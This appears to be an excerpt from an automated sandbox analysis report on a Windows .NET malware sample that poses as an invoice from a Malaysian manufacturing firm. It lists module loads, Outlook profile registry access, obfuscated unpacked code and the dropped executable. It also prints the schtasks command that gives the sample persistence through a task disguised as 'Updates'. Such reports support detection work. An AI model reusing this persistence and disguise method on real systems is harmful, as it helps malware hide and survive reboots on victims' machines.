                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.65b0000.5.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.3492250.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs.Net Code: yoJfVvX4u3 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.24d1188.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs.Net Code: yoJfVvX4u3 System.Reflection.Assembly.Load(byte[])
                    Source: 12.2.GhrKoSGuCdvpJ.exe.32b1104.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A9C30 push esp; retf 010Ch11_2_010A9D55
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06929233 push es; ret 11_2_06929244
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703942D push edi; ret 20_2_0703942E
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: section name: .text entropy: 7.924386208696683
                    Source: GhrKoSGuCdvpJ.exe.0.drStatic PE information: section name: .text entropy: 7.924386208696683
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, HecPmJ6gFWvqumjiqv.csHigh entropy of concatenated method names: 'D3uJEMNjoA', 'CcRJBr8j7f', 'w7ZJDqbEil', 'Kb4J5VccR0', 'd86JN4NVnq', 'yFXJR32HNl', 'qPoJq2OdFq', 'F6xJXSvrlm', 'dKqJG47Bjd', 'I7oJgXgVvn'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, SMh6MIRIc6OakG07pp.csHigh entropy of concatenated method names: 'OmjkHs9vCX', 'F7ukJ1FjNW', 'RbRk1X7CL4', 'RoLkPpEJ0Y', 'lpckQADnKf', 'O9gkp4NJN5', 'JYaks2i9YL', 'dlHkuCtgfP', 'VoTkUmyXm7', 'T2BkeuVICG'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, uoVP2uCg0bdWUyFWjv.csHigh entropy of concatenated method names: 'uYW1dLwxiV', 'vyY1WWhoOC', 'chU10QmOqd', 'Ess1Z8lZoS', 'iRR1L6qK1P', 'Cb61C0WviQ', 'uCR12ILHVs', 'HJR1kgUixu', 'yx419Q7yq0', 'oP21r4iRaE'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, sTZIxnbilXR1LmWj3Sl.csHigh entropy of concatenated method names: 'm8u9aSqCN2', 'UR49OxHU1x', 'Nlk9V1JFZI', 'tH09dbXSAh', 'D9c9c0YPi8', 'ai09WVJrWG', 'EkR9lpPKlE', 'oJC90f34Qh', 'RKg9Zwib4d', 'm8g9xOnYZA'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, jy01KOzR750y1LXxEC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rwq9TOOtRZ', 'I5u9LImMm8', 'XEt9CPTKuL', 'wBG92qSwSi', 'iLE9k4ZdH3', 'jw099TlRgJ', 'Mpb9rFKkq0'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, t1DfyrSZWB1uISyNpZ.csHigh entropy of concatenated method names: 'K9KQ7TFMnh', 'E0IQJbmwkI', 'HiEQP81RaQ', 'aMnQpxiwnm', 'r5QQs1NnXd', 'j0lPNo1WDU', 'Mb2PRvhoO2', 'Np1PqkDSZE', 'deNPXOiUQH', 'XidPGLYKSW'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, QNWvhQjrZINN7KPu3U.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'p3JYG8gFty', 'GSuYgZiR1n', 'GxUYzZna0i', 'jaYtKp9Nkw', 'n3rtM42g7l', 'OJVtY8XMNN', 'xsPtttALNb', 'E1s42BjIUtnsAMJYRHL'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, kiqa3DwVxysX4lOlBK.csHigh entropy of concatenated method names: 'xl8VBKgsT', 'lG4dl9vV1', 'D8RWfMay5', 'VAelEEp3T', 'DtbZaqC94', 'CfZxk3HTM', 'Kq4VpAV4K2b2FpedVo', 'aLqKjK9J0dhueLmyJc', 'fPPkBqLY8', 'vU3rl5W7x'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, G1b9Yx2TcPUdaY9281.csHigh entropy of concatenated method names: 'uWiMpHEYse', 'IbEMsFwYUM', 'wQRMUILgWl', 'bWUMecCkd4', 'RpCMLFxjHm', 'mx8MCpwa6Y', 'MnhbSl6gyXKBTqRjxf', 'Ph7hI45WRD5FMMD70y', 'rWhMM88Iyt', 'vOvMtmCp0V'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, GgAgrKJsDwJ5JIVu6G.csHigh entropy of concatenated method names: 'CYdT0xQiSd', 'KQtTZ3BKEN', 'YmFT42MUS2', 'gypTbLQjw9', 'Mf7ToswUDs', 'XVTT3c4Xeb', 'HdiTn8u5IL', 'o7RTydAhKI', 'dR9T6R6wEh', 'op1Twjnngd'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, rrIrYEfBhY39sDlwNH.csHigh entropy of concatenated method names: 'dWi2XKVHcf', 'fA52gvkjr1', 'pvekKY05mS', 'tZSkMcqCTm', 'bcJ2whR0UC', 'J2L2jJE5Wk', 'tau2AEFhsf', 'W2y2E4pyN1', 'oQD2B20cvM', 'cEm2DN2fmQ'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, OpG0a7BjWJqeIRfEJr.csHigh entropy of concatenated method names: 'MQUpaEePsA', 'SDhpOONDfA', 'tvhpV8nsqh', 'KP2pdxnAU3', 'XUwpcrH6Uu', 'bhJpWDdZLR', 'PDOplhYHlf', 'ow7p0hlVe7', 'mtmpZGmCau', 'DXipxn90sw'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, a6Rf7FhOnIQQp4Keik.csHigh entropy of concatenated method names: 'Dispose', 'I1PMG2xkVV', 'IuVYbNwK7t', 'Lht8835Io1', 'WR4MgnZ2H5', 'TDTMzLOs2m', 'ProcessDialogKey', 'n6NYKJvkQ5', 'dEhYMgAtVW', 'PoSYYEGiQh'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, xhRr5d38UPcJ29ohL9.csHigh entropy of concatenated method names: 'MwxpH2ii7p', 'u33p1mU9NQ', 'XicpQ4ZAWi', 'y1NQgX81EX', 'iRmQzNJ1hS', 'XOVpKR5dpH', 'xKopMw7ld2', 'WdcpYhniml', 'IquptxSwR0', 'erRpf2uyr9'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, n99CWu8o4qWU03vC7R.csHigh entropy of concatenated method names: 'DLD2UTZ9CT', 'fck2e0G5Lx', 'ToString', 'X132HV5up9', 'cLa2JUBgox', 'l7n21BZcD1', 'JFh2PRon5I', 'P2Y2Q4FQEh', 'O0L2pAe2jI', 'Uc72s8f5WQ'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, OH7rokb1NRcoyR55vja.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gaVrE0mBJk', 'x3irBpZvIU', 'RUDrDd0gLR', 'bVZr5LUDEp', 'lkqrN0rBv6', 'iPJrR9B78l', 'PuLrqaZFDk'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, bFojdgmUnuGXsZ2Et8.csHigh entropy of concatenated method names: 'elfPcputW4', 'lWxPlon1Yc', 'rLJ1hg5Ofh', 'vKh1oiFNKi', 'vCs13gEpRU', 'Q351Svy54f', 'eIb1nFGGK9', 'fHE1yqtuUT', 'WGm1vKnH4G', 'SfZ16RdAEF'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, fn3dhyeRmpy1aqIbhC.csHigh entropy of concatenated method names: 'dsq9MA7poc', 'CLi9tkAdux', 'wgW9f0Wiyp', 'gdk9HLGZsH', 'TCX9JXl0Vv', 'oqg9PfoWBV', 'Vxe9QbXUF9', 'Yl7kqj7IAw', 'DtIkXZW8El', 'gwLkGQnX5y'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.csHigh entropy of concatenated method names: 'V76t7gMw0d', 'FXPtHUxbmi', 'NFGtJqfcnZ', 'dFEt1WcFxY', 'mwgtPNMsSv', 'YINtQ3Do7A', 'KRRtpdXbNl', 'J6ltsWWPId', 'w4EtueCj9s', 'Pv9tUInC4d'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, UHgAuR0KWEiSURYQpg.csHigh entropy of concatenated method names: 'ToString', 'Xn8Cwkyen4', 'lVUCbRu7jv', 'tyjChoeN09', 'UpHCohJaxp', 'cSXC3oQd9L', 'sYACSFHVi3', 'D5cCnlbkXm', 'DpNCy4Uj0X', 'l7BCvxo5XQ'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, HecPmJ6gFWvqumjiqv.csHigh entropy of concatenated method names: 'D3uJEMNjoA', 'CcRJBr8j7f', 'w7ZJDqbEil', 'Kb4J5VccR0', 'd86JN4NVnq', 'yFXJR32HNl', 'qPoJq2OdFq', 'F6xJXSvrlm', 'dKqJG47Bjd', 'I7oJgXgVvn'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, SMh6MIRIc6OakG07pp.csHigh entropy of concatenated method names: 'OmjkHs9vCX', 'F7ukJ1FjNW', 'RbRk1X7CL4', 'RoLkPpEJ0Y', 'lpckQADnKf', 'O9gkp4NJN5', 'JYaks2i9YL', 'dlHkuCtgfP', 'VoTkUmyXm7', 'T2BkeuVICG'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, uoVP2uCg0bdWUyFWjv.csHigh entropy of concatenated method names: 'uYW1dLwxiV', 'vyY1WWhoOC', 'chU10QmOqd', 'Ess1Z8lZoS', 'iRR1L6qK1P', 'Cb61C0WviQ', 'uCR12ILHVs', 'HJR1kgUixu', 'yx419Q7yq0', 'oP21r4iRaE'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, sTZIxnbilXR1LmWj3Sl.csHigh entropy of concatenated method names: 'm8u9aSqCN2', 'UR49OxHU1x', 'Nlk9V1JFZI', 'tH09dbXSAh', 'D9c9c0YPi8', 'ai09WVJrWG', 'EkR9lpPKlE', 'oJC90f34Qh', 'RKg9Zwib4d', 'm8g9xOnYZA'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, jy01KOzR750y1LXxEC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rwq9TOOtRZ', 'I5u9LImMm8', 'XEt9CPTKuL', 'wBG92qSwSi', 'iLE9k4ZdH3', 'jw099TlRgJ', 'Mpb9rFKkq0'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, t1DfyrSZWB1uISyNpZ.csHigh entropy of concatenated method names: 'K9KQ7TFMnh', 'E0IQJbmwkI', 'HiEQP81RaQ', 'aMnQpxiwnm', 'r5QQs1NnXd', 'j0lPNo1WDU', 'Mb2PRvhoO2', 'Np1PqkDSZE', 'deNPXOiUQH', 'XidPGLYKSW'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, QNWvhQjrZINN7KPu3U.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'p3JYG8gFty', 'GSuYgZiR1n', 'GxUYzZna0i', 'jaYtKp9Nkw', 'n3rtM42g7l', 'OJVtY8XMNN', 'xsPtttALNb', 'E1s42BjIUtnsAMJYRHL'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, kiqa3DwVxysX4lOlBK.csHigh entropy of concatenated method names: 'xl8VBKgsT', 'lG4dl9vV1', 'D8RWfMay5', 'VAelEEp3T', 'DtbZaqC94', 'CfZxk3HTM', 'Kq4VpAV4K2b2FpedVo', 'aLqKjK9J0dhueLmyJc', 'fPPkBqLY8', 'vU3rl5W7x'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, G1b9Yx2TcPUdaY9281.csHigh entropy of concatenated method names: 'uWiMpHEYse', 'IbEMsFwYUM', 'wQRMUILgWl', 'bWUMecCkd4', 'RpCMLFxjHm', 'mx8MCpwa6Y', 'MnhbSl6gyXKBTqRjxf', 'Ph7hI45WRD5FMMD70y', 'rWhMM88Iyt', 'vOvMtmCp0V'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, GgAgrKJsDwJ5JIVu6G.csHigh entropy of concatenated method names: 'CYdT0xQiSd', 'KQtTZ3BKEN', 'YmFT42MUS2', 'gypTbLQjw9', 'Mf7ToswUDs', 'XVTT3c4Xeb', 'HdiTn8u5IL', 'o7RTydAhKI', 'dR9T6R6wEh', 'op1Twjnngd'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, rrIrYEfBhY39sDlwNH.csHigh entropy of concatenated method names: 'dWi2XKVHcf', 'fA52gvkjr1', 'pvekKY05mS', 'tZSkMcqCTm', 'bcJ2whR0UC', 'J2L2jJE5Wk', 'tau2AEFhsf', 'W2y2E4pyN1', 'oQD2B20cvM', 'cEm2DN2fmQ'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, OpG0a7BjWJqeIRfEJr.csHigh entropy of concatenated method names: 'MQUpaEePsA', 'SDhpOONDfA', 'tvhpV8nsqh', 'KP2pdxnAU3', 'XUwpcrH6Uu', 'bhJpWDdZLR', 'PDOplhYHlf', 'ow7p0hlVe7', 'mtmpZGmCau', 'DXipxn90sw'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, a6Rf7FhOnIQQp4Keik.csHigh entropy of concatenated method names: 'Dispose', 'I1PMG2xkVV', 'IuVYbNwK7t', 'Lht8835Io1', 'WR4MgnZ2H5', 'TDTMzLOs2m', 'ProcessDialogKey', 'n6NYKJvkQ5', 'dEhYMgAtVW', 'PoSYYEGiQh'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, xhRr5d38UPcJ29ohL9.csHigh entropy of concatenated method names: 'MwxpH2ii7p', 'u33p1mU9NQ', 'XicpQ4ZAWi', 'y1NQgX81EX', 'iRmQzNJ1hS', 'XOVpKR5dpH', 'xKopMw7ld2', 'WdcpYhniml', 'IquptxSwR0', 'erRpf2uyr9'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, n99CWu8o4qWU03vC7R.csHigh entropy of concatenated method names: 'DLD2UTZ9CT', 'fck2e0G5Lx', 'ToString', 'X132HV5up9', 'cLa2JUBgox', 'l7n21BZcD1', 'JFh2PRon5I', 'P2Y2Q4FQEh', 'O0L2pAe2jI', 'Uc72s8f5WQ'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, OH7rokb1NRcoyR55vja.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gaVrE0mBJk', 'x3irBpZvIU', 'RUDrDd0gLR', 'bVZr5LUDEp', 'lkqrN0rBv6', 'iPJrR9B78l', 'PuLrqaZFDk'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, bFojdgmUnuGXsZ2Et8.csHigh entropy of concatenated method names: 'elfPcputW4', 'lWxPlon1Yc', 'rLJ1hg5Ofh', 'vKh1oiFNKi', 'vCs13gEpRU', 'Q351Svy54f', 'eIb1nFGGK9', 'fHE1yqtuUT', 'WGm1vKnH4G', 'SfZ16RdAEF'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, fn3dhyeRmpy1aqIbhC.csHigh entropy of concatenated method names: 'dsq9MA7poc', 'CLi9tkAdux', 'wgW9f0Wiyp', 'gdk9HLGZsH', 'TCX9JXl0Vv', 'oqg9PfoWBV', 'Vxe9QbXUF9', 'Yl7kqj7IAw', 'DtIkXZW8El', 'gwLkGQnX5y'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.csHigh entropy of concatenated method names: 'V76t7gMw0d', 'FXPtHUxbmi', 'NFGtJqfcnZ', 'dFEt1WcFxY', 'mwgtPNMsSv', 'YINtQ3Do7A', 'KRRtpdXbNl', 'J6ltsWWPId', 'w4EtueCj9s', 'Pv9tUInC4d'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, UHgAuR0KWEiSURYQpg.csHigh entropy of concatenated method names: 'ToString', 'Xn8Cwkyen4', 'lVUCbRu7jv', 'tyjChoeN09', 'UpHCohJaxp', 'cSXC3oQd9L', 'sYACSFHVi3', 'D5cCnlbkXm', 'DpNCy4Uj0X', 'l7BCvxo5XQ'
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeFile created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
